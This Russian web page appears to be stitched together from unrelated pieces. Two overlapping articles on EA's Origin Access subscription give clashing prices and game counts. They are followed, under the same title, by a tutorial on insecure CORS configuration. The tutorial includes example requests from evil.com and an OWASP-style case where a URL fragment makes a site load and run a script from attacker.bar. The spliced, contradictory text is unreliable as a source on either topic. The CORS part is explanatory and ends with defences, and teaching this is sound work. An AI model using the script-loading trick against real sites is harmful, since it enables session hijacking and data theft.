Что такое Origin Access и как оно работает

Что такое Origin Access и как оно работает

Что такое Origin Access и как оно работает

Ни для кого не секрет, что крупные издатели и разработчики компьютерных игр всячески ухищряются ради привлечения новых клиентов.

В XXI веке абсолютное большинство из них имеют собственные платформы для торговли цифровой продукцией, на которых они постоянно предлагают товары по акционной цене, устраивают глобальные распродажи, всяческие чёрные пятницы и т. п.

Примерами таких платформ являются, например, Steam, Xbox Live, Uplay. Каждая из них имеет свои особенности и, конечно же, предоставляет возможности купить игры от абсолютно разных разработчиков.

Electronic Arts, начинавшая свою деятельность как издатель игр, в последующем смогла приобрести нескольких успешных и перспективных разработчиков, что принесло ей немалые деньги и всемирную известность среди геймеров. Самыми известными продуктами корпорации стали серии спортивных игр, в особенности FIFA, а также очень популярная гоночная серия Need For Speed и мультиплеерный шутер Battlefield.

Что же такое этот Origin Access, сколько он стоит, какими играми пользователь сможет насладиться и на каких условиях?

Что такое Origin Access?

Следует сразу отметить, что Origin и Origin Access — это слегка разные вещи. Первый — цифровой клиент в виде программы или интернет-ресурса, который позволяет приобретать и устанавливать купленные игры, хранить их сохранения, автообновлять, общаться с друзьями в онлайн-чате и т. д.

Origin Access представляет собой платную подписку, которая позволяет её владельцу иметь доступ к определённым играм.

Приобретая её, пользователь имеет право играть на протяжении всего платного периода без ограничений.

Помимо этого, каждый, кто покупает подписку, автоматически получает бонус в виде 10% скидки на все игры магазина, которая, между прочим, плюсуется с другими скидками и акционными предложениями.

Как это работает?

Алгоритм действия подписки весьма прост. Пользователь приобретает её за символические 249 рублей в месяц, а взамен получает неограниченный доступ к определённому списку игр, который называется The Vault.

Помимо месячной, пользователи также могут оплатить годовую подписку, стоимость которой составит 2988 рублей.

На данный момент подписка обеспечит вам возможность поиграть в 29 игр, среди которых, например, вся серия Mass Effect, Need For Speed Rivals и Most Wanted, 3 части космо-хоррора Dead Space, Titanfall и другие. Магазин обнадеживающе уверяет, что список игр и дальше будет расширяться.

Все игры являются полными, а не демоверсиями. Кстати, подписка также позволяет увидеть ранние и бета-версии игр.

Теперь, разобравшись в том, какие услуги предоставляет эта подписка, следует разложить по полочкам её достоинства и недостатки. Начнём с плюсов:

  1. Цены на игры нынче составляют чуть ли не целое состояние для некоторых геймеров. Просто глянув на список игр, доступ к которым получит подписчик, и сравнив их с ценами на полную версию, многие не будут долго колебаться, ведь последняя стоит довольно немало по сравнению с подпиской. Например, Battlefield 4 Premium Edition сейчас стоит аж 1999 рублей. Если бы вам просто хотелось месяц-другой поиграть в разнообразные игры, эта подписка делает это доступным и возможным.
  2. Иногда новоиспечённые игры получают довольно-таки прохладный приём либо же имеют много как положительных, так и отрицательных отзывов. Становится не совсем понятно, стоит ли она вашего внимания и потраченного времени или нет? Конечно же, лучше всего попробовать продукт самостоятельно и дать ему личную оценку. Имея эту подписку, пользователь в любой момент сможет протестировать новую игру либо её раннюю версию.
  3. Очень приятным выглядит бонус в виде 10% скидки на весь ассортимент товара. Многие специальные издания игр могут похвастаться ценником в 3, 4, а иногда и 5 тысяч рублей, поэтому небольшая скидка является как минимум приятным дополнением к покупке.

У любого продукта есть две стороны медали. Раз плюсы уже очевидны и описаны, давайте рассмотрим и минусы:

  1. Как мы уже выяснили, подписка действительна ровно один месяц, после чего вы можете продлить её, заплатив за следующий месяц либо же отключить в настройках профиля. По истечении срока действия, пользователь теряет доступ ко всем скачанным играм, а вместе с этим и скидку 10% в магазине.
  2. Подписка явно не подходит человеку, который попросту не имеет достаточно времени для того, чтобы воспользоваться её преимуществами. Здесь всё строго. Не успели поиграть из-за личных причин — это сугубо ваша проблема.
  3. Тем геймерам, которым особенно по душе пришлась определённая игра, и они явно намерены не раз её проходить и перепроходить, тоже стоит пройти мимо. Гораздо проще купить полную версию, ведь доступ к ней не исчезнет через месяц, и вам не придётся платить за целый список других игр, которые, вполне возможно, абсолютно не интересны лично вам.
  4. Если у вас есть собственная коллекция, и вы всегда держите свои игры под боком — этот вариант также не для вас. Ведь, как уже упоминалось, после окончания действия подписки, пользователь теряет доступ к играм.

В целом каждый геймер сам определится в целесообразности покупки рассматриваемой подписки. Ведь предоставляя несомненные плюсы, она в то же время имеет и ряд недостатков, которые многим могут прийтись не по вкусу. Вам же остаётся расписать все плюсы и минусы лично для вас и решить, стоит ли покупка потраченных средств.

Подписка Origin Access

Что такое Origin Access и как оно работает

  1. Скачать Origin

    2. >>

  2. Частые вопросы

    3. >>

  3. Origin Access

Редакция Origin-pro.ru

Origin Access – специальная система платной подписки в Origin, предоставляющая её обладателю за фиксированную цену доступ ко всем играм из определённого магазином перечня. В оплаченный период пользователь получает полный доступ абсолютно ко всем играм, участвующим в программе. Данный список именуется «The Vault» и включает в себя 75 первоклассных и весьма дорогостоящих игр.

Origin Access обладает собственными уникальными особенностями, а так же характерными преимуществами и недостатками. Кроме того, EA обещает постоянно расширять список предоставляемых по подписке игр. Цена на месячный вариант на данный момент составляет 299 рублей, годовой – 1799 рублей (экономия в 50%).

Рассмотрим подробнее, что это, как работает и как оформляется, а так же разберём все аспекты данного сервиса.

Unravel Mirror's Edge Catalyst Mass Effect 3 Plants vs. Zombies Garden Warfare 2 FIFA 16 Battlefield 4 Premium Edition Need for Speed Crysis 3 Digital Deluxe Edition Battlefield Hardline Ultimate Edition Titanfall Deluxe Edition Dragon Age: Инквизиция Plants vs. Zombies Garden Warfare Torchlight II FIFA 15 This War of Mine SimCity: Complete Edition Trine Enchanted Edition The Banner Saga Need for Speed Rivals Dead Space 3 Plants vs. Zombies Game of the Year Edition Dead Space 2 Dead Space Dragon Age: Начало Ultimate Edition Crysis 2 Maximum Edition Mass Effect 2 Digital Deluxe Edition Dragon Age II Need for Speed Most Wanted SimCity 2000 Special Edition Crysis Mirror's Edge Mass Effect Mini Metro Battlefield 3 Medal of Honor Allied Assault War Chest The Sims 3 Набор для начинающих Ultima I: The First Age of Darkness Ultima II: The Revenge of the Enchantress Ultima III: Exodus Ultima IV: Quest of the Avatar Ultima V: Warriors Of Destiny Ultima VII: The Complete Edition Ultima VIII Gold Edition Dungeons of Dredmor Trine 2 Peggle Jade Empire: Special Edition Crusader: No Remorse Crusader: No Regret

Все плюсы использования подписки на поверхности. К ключевым из них можно отнести:

  1. Отсутствие необходимости приобретения игр за полную цену. Практически все предоставляемые экземпляры обладают внушительным ценником, часто превышающим даже стоимость годовой подписки. Если пользователю хотелось месяц-другой отдохнуть в определённой дорогостоящей игре, Origin Access – это определённо то, что ему нужно.
  2. Ранний ознакомительный доступ для подписчиков к подлежащим к выходу новинкам раньше любого другого пользователя, автоматические обновления.
  3. Возможность тестирования поведения различных игр на собственном компьютере перед их окончательной покупкой. Месячная подписка на игры EA в 299 рублей позволит полноценно проверить работоспособность и оценить геймплей, после чего принять взвешенное решение о необходимости покупки.
  4. Предоставление скидки в 10% на всё в магазине. Например, Star Wars Battlefront в комплекте с сезонным пропуском стоит 5500 рублей, а при приобретении подписки пользователь сможет использовать 10% скидку и купить Star Wars по цене в 4950 рублей. Преимущества очевидны – игра куплена со скидкой, превышающей цену подписки, и пользователь может ещё в течение месяца тестировать другие игры бесплатно, что крайне выгодно.
  5. Возможность покупки сразу на нескольких человек. Например, её можно подарить друзьям для того, чтобы поиграть в компании в полюбившийся шутер.

Как видно, список преимуществ достаточно внушителен.

Подписка на Access обладает и рядом характерных особенностей:

  1. Предоставляемые игры образуют перечень, который называется «The Vault». Со временем список игр расширяется;
  2. Отменяется при переезде в другой регион, т.к. условия приобретения и состав коллекции «The Vault» целиком и полностью зависит от региона.
  3. Тестирование в числе первых новых игр даже до их официального выхода. Несмотря на то, что это пробная версия, весь полученный прогресс будет сохранён, что позволит пользователю приобрести игру в будущем и продолжить с того места, где он остановился;
  4. Наличие двух тарифов — купить Access можно на месяц за 299 рублей или на год за 1799 рублей.

Список игр, доступных по подписке, называется The Vault

Сделав некоторые выводы из всего вышеописанного, можно составить и список недостатков Access.

Недостатки

Главными недостатками, останавливающими некоторых пользователей от покупки подписки, являются следующие:

  • Ограниченность возможности играть длительностью подписки. По истечению срока прогресс будет сохранён, однако игра не уйдёт в собственность игрока, в связи с чем для получения доступа придётся купить её или продлить подписку.
  • Не даёт доступа к некоторым важным DLC и дополнительному контенту, из-за чего использование некоторых игр теряет смысл.
  • Access не подойдёт тому, кто играет крайне редко – она будет потрачена впустую.
  • При наличии желания играть дольше месяца или года она также теряет смысл – лучшим решением будет приобрести желаемую игру.
  • Ничего не перемещается в библиотеку, что не по душе некоторым пользователям.

Перейдём к непосредственному рассмотрению процесса оформления и оплаты доступа.

Как оформить, способы оплаты

Весь процесс оформления доступа к подписке можно представить пошагово:

  1. Заходим на официальный сайт Origin
  2. В левом меню кликаем на «Origin Access». Здесь же можно ознакомиться и со списком предлагаемых игр.
  3. В открывшемся окне кликаем по кнопке «Присоединяйтесь к Origin Access».
  4. Выбираем тариф (на месяц или на год) и жмём на «Далее».
  5. Вводим данные собственного аккаунта Ориджин во всплывшем окне.
  6. В способе оплаты выбираем «Новая учётная запись PayPal» и жмём на «Перейти к обзору заказа», где остаётся лишь добавить кошелёк и произвести оплату.

Оплата Ориджин Access в России осуществляется только через PayPal, К сожалению, это единственный способ покупки на данный момент. Зарегистрироваться на PayPal можно бесплатно, после чего пополнить кошелёк с обычной банковской карты.

Отмена Origin Access

Отказаться от продлени можно на сайте Electronic Arts. Зайдите в управлении аккаунтом, перейдите на вкладку «Origin Access» и нажмите «Отменить подписку»

Небезопасный cross-origin resource sharing

Что такое Origin Access и как оно работает

 
Cross-origin resource sharing — технология современных браузеров, которая позволяет предоставить веб-странице доступ к ресурсам другого домена. В этой статье я расскажу об этой технологии, призванной обеспечить безопасность, или наоборот, поставить веб-приложение под удар.

Что такое CORS?

CORS — это механизм безопасности, который позволяет веб-странице из одного домена обращаться к ресурсу с другим доменом (кросс-доменным запросом). Без таких функций, как CORS, веб-сайты ограничиваются доступом к ресурсам одного и того же происхождения через так называемую политику единого происхождения.

Первым шагом в понимании CORS является знание того, как работают некоторые функции безопасности веб-браузеров. По умолчанию веб-браузеры не разрешают AJAX-запросы на сайты, кроме сайта, который вы посещаете.

Это называется политикой единого происхождения, и это важная часть модели веб-безопасности.

Совместное использование ресурсов между разными источниками (cross-origin resource sharing) — это механизм HTML 5, который дополняет политику единого происхождения для упрощения совместного использования ресурсов домена между различными веб-приложениями.

Спецификация CORS определяет набор заголовков, которые позволяют серверу и браузеру определять, какие запросы для междоменных ресурсов (изображения, таблицы стилей, сценарии, данные и т. д.) разрешены, а какие нет. CORS является техникой для ослабления правила одного источника, позволяя JavaScript на web странице обрабатывать REST API запросы от другого источника.

По своей сути, CORS это защитная оболочка для браузера. Совместное использование ресурсов между разными источниками очень важно в современном мире сложных веб-приложений, и все браузеры поддерживают его. В частности, CORS обычно используется для междоменных AJAX запросов.

Обмен запросами

Взаимодействие ресурсов начинается с отправки GET, POST или HEAD запросу к тому или иному ресурсу на сервере. Тип содержимого POST запроса ограничен application/x-www-form-urlencoded, multipart/form-data или plaintext. Запрос включает заголовок Origin, который и указывает на происхождение клиентского кода.

Веб приложение проверяет происхождение запроса и на основании Origin либо принимает запрос, либо отвергает его.

Если запрос принят, запрашиваемые сервер ответит заголовком Access-Control-Allow-Origin. Этот заголовок будет указывать клиенту с каким происхождением будет разрешен доступ.

Принимая во внимание, что Access-Control-Allow-Origin соответствует Origin запроса, браузер разрешит запрос.

При запросе на site.ru/resource с site.com/some будут следующие заголовки:

GET /resourceHost:site.ruOrigin: http://site.com

Если запрос принят, запрашиваемый сервер добавляет к ответу заголовок Access-Control-Allow-Origin, содержащий домен запроса site.com.

Access-Control-Allow-Origin указывает, какие домены могут обращаться к ресурсам сайта. Например, если компания имеет домены site.ru и site.com, то ее разработчики могут использовать этот заголовок, чтобы предоставить site.com доступ к ресурсам site.ru.

Access-Control-Allow-Methods определяет, какие HTTP-запросы (GET, PUT, DELETE и т. д.) могут быть использованы для доступа к ресурсам. Этот заголовок позволяет повысить безопасность, указав какие методы действительны, когда site.com обращается к ресурсам site.ru.

Access-Control-Max-Age указывает время жизни предзапроса (также он называется «предполетным») доступности того или иного метода, после которого должен быть выполнен новый запрос на тот или иной метод.

Отказ от политики запроса из белого списка

Использование правильных заголовков, методов и доверенных доменов вроде бы не позволяет злоумышленнику вклиниться в эту цепочку обмена. На самом деле это не так. И подводит здесь коварная *.

Наиболее распространенная проблема безопасности при внедрении CORS — это отказ от проверки запроса белых списков. Зачастую разработчики устанавливают значение для Access-Control-Allow-Origin в '*'. Это позволяет любому домену в Интернете получать доступ к ресурсам этого сайта.

Запрос:

GET /resource HTTP/1.1Host: site.ruReferer: http://evil.com/request.htmlOrigin: http://evil.com

Ответ:

HTTP/1.1 200 OKAccess-Control-Allow-Origin: *

Основания проблема кроется в том, что многие компании размещают API в пределах домена, не ограничивания к нему доступ политикой «белого списка». Это порождает уязвимость.

Attack scenario

Большинство веб-приложений использует файлы cookie для отслеживания информации о сеансе. При генерации cookie ограничены определенным доменом. При каждом HTTP запросе к этому домену браузер подставлять значение cookie, созданные для этого домена. Это относится к каждому HTTP запросу — для получения изображений, страниц или AJAX-вызовов.

Что это означает на практике: при авторизации в goodsite.ru, cookie генерируются и хранятся для этого домена. Веб-приложение goodsite.ru основано на технологии SPA и содержит REST API на goodsite.ru/api для взаимодействия с помощью AJAX.

Предположим, что вы просматриваете badsite.ru, будучи авторизованным на goodsite.ru. Без ограничения Access-Control-Allow-Origin по белому списку (с указанием сайта) badsite.ru может выполнить любой разрешенный аутентифицированный запрос к goodsite.

ru, даже не имея прямого доступа к сессионной cookie!

Это связано с тем, что браузер автоматически привязывает файлы cookie к goodsite.ru для любых HTTP запросов в этом домене, включая AJAX запросы от badsite.ru в goodsite.ru. Таким образом атакующий может взаимодействовать даже с вашим внутренним ресурсом, недоступным в сети интернет и находящимся в корпоративной сети.

Наглядные примеры

В качестве примера приведу код OWASP Testing Guide. Уязвимое веб-приложение, с неверно настроенной политикой Access-Control-Allow-Origin.

Например, такой запрос будет показывать содержимое файла profile.php:

http://example.foo/main.php#profile.php

Запрос:

GET http://example.foo/profile.php HTTP/1.1Host: example.fooAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://example.foo/main.php

Ответ:

HTTP/1.1 200 OKConnection: Keep-AliveContent-Type: text/html [Response Body]

Т.к. отсутствует проверка URL-адреса, атакующий может добавить скрипт, который будет выполняться в контексте домена example.foo со следующим URL:

http://example.foo/main.php#http://attacker.bar/file.php

Запрос:

GET http://attacker.bar/file.php HTTP/1.1Host: attacker.barAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://example.foo/main.phpOrigin: http://example.foo

Ответ:

HTTP/1.1 200 OKAccess-Control-Allow-Origin: *Content-Type: text/html Пейлоад attacker.bar

Результат:

В качестве еще одного примера рекомендую ознакомиться с Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP — публичным раскрытием уязвимости, включая небольшую видео-демонстрацию.

Защитные меры

Используйте белые списки доменов. Если такой возможности нет — размещайте API вне домена — политики CORS для sub.site.ru, site.ru и даже разным портам будут различаться.

Указывайте конкретные методы обращения.

Не используйте wildcard — CORS учитывает или * или домен.

Обязательно указывайте протокол. «Access-Control-Allow-Origin: site.ru» не будет учтён, поскольку протокол отсутствует.

При использовании Access-Control-Allow-Credentials: true всегда используется Access-Control-Allow-Origin: домен — при использовании * браузер не получит ответ.

No related posts.

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.